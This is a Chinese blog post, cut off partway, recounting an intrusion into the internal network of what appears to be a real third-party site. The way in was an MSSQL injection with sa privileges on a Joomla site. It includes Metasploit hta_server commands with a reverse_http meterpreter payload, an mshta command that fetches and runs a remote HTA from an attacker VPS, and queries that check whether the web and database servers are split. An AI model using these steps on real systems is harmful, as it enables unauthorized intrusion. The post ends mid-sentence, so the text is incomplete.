记录一次SQL引起的内网渗透

一 、 前言

近期一直再学习内网渗透,实验什么的都是玩玩靶机

这一天朋友说有个站点有漏洞,就发过来看了一些是一个SQL注入,继而开启了这次内网渗透。水平有限,并且初学哈哈哈哈!没有什么技术要点纯属误打误撞,如果有什么错误的地方希望大佬多多指点!

二 、 WEB点进入内网

这次渗透是从站库分离的情况下在深入进去内网在拿下域控服务器,也都是普通的渗透思路,并没有什么技术含量!

首先WEB点是一个MSSQL注入漏洞,并且这个注入是sa权限的!

首先这个站点是使用JoomlaCMS搭建的,但是在一处Study信息登记处发现了SQL注入漏洞
自动草稿 
接着抓下此处查询的数据包进行注入,并且或者了是高权限,可以开启xp_cmdshell来进行进一步的提权。

在注入的返回的指纹信息可以获知对方的操作系统大概率就是windows Server 2012系统

自动草稿 

那么接下来不用想就是直接提权到MSF上面了,这里使用hta来提权到MSF

msf5 > use exploit/windows/misc/hta_servermsf5 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_httppayload => windows/meterpreter/reverse_httpmsf5 exploit(windows/misc/hta_server) > set lhost VPS_IPlhost =>  VPS_IP

这里就开始监听断开,然后需要在对方哪里执行命令。

如下

接着在执行 mshta.exe http://VPS_IP:8080/IAKWSlu.hta

执行之后对方直接上线MSF了,这里可以看到对方的主机名称就叫DATABASE.

自动草稿

看似一切顺利,但是往往都不会如自己想的那样,上线之后一直不能执行命令,都返回超时。在VPS的流量过去应该也不会有多大的阻碍啊!

也许是被对方的一些设备拦截了吧!

自动草稿

既然MSF不能操作的话,SQLMAP提供的shell也不是很好操作,那么可以试着写入webshell进入到对方主机上面。

但是我查找了一番并无WEB路径,这里时候想起了它的主机名称,会不会是一个站库分离的网站。

对于MSSQL注入查询是否站库分离很简单

select @@servernameselect host_name()

自动草稿

果不其然这里的确就是站库分离。

既然是MSF的流量比较明显,也不能写入webshell,那么我现在就希望能让其上线CobaltStrike吧!

经过一%A

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享